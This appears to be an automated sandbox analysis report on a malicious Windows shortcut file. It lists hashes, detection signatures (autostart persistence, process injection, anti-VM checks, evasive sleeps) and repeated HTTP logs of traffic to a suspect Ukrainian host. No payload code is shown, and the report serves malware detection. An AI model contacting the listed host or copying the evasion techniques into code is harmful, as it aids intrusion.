Windows Analysis Report
T15hf0Y3mp.lnk

Overview

General Information

Sample name:	T15hf0Y3mp.lnk renamed because original name is a hash value
Original sample name:	b8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73.lnk
Analysis ID:	1543062
MD5:	558ed2a75be9da451504b5ef33eed93c
SHA1:	4c9e126b112ac8c76029e062dbd7d31569e0ce57
SHA256:	b8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73
Tags:	calendar-stib-com-ualnkuser-JAMESWT_MHT
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

AI detected suspicious sample

Powershell creates an autostart link

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Suspicious Parent Double Extension File Execution

Windows shortcut file (LNK) contains suspicious command line arguments

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: T15hf0Y3mp.lnk

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: unknown

HTTPS traffic detected: 185.68.16.189:443 -> 192.168.2.4:49730 version: TLS 1.2

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: UKRAINE-ASUA UKRAINE-ASUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /programy-nauczania/GIEAnnualConferenceStage2 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /programy-nauczania/GIEAnnualConferenceStage2 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
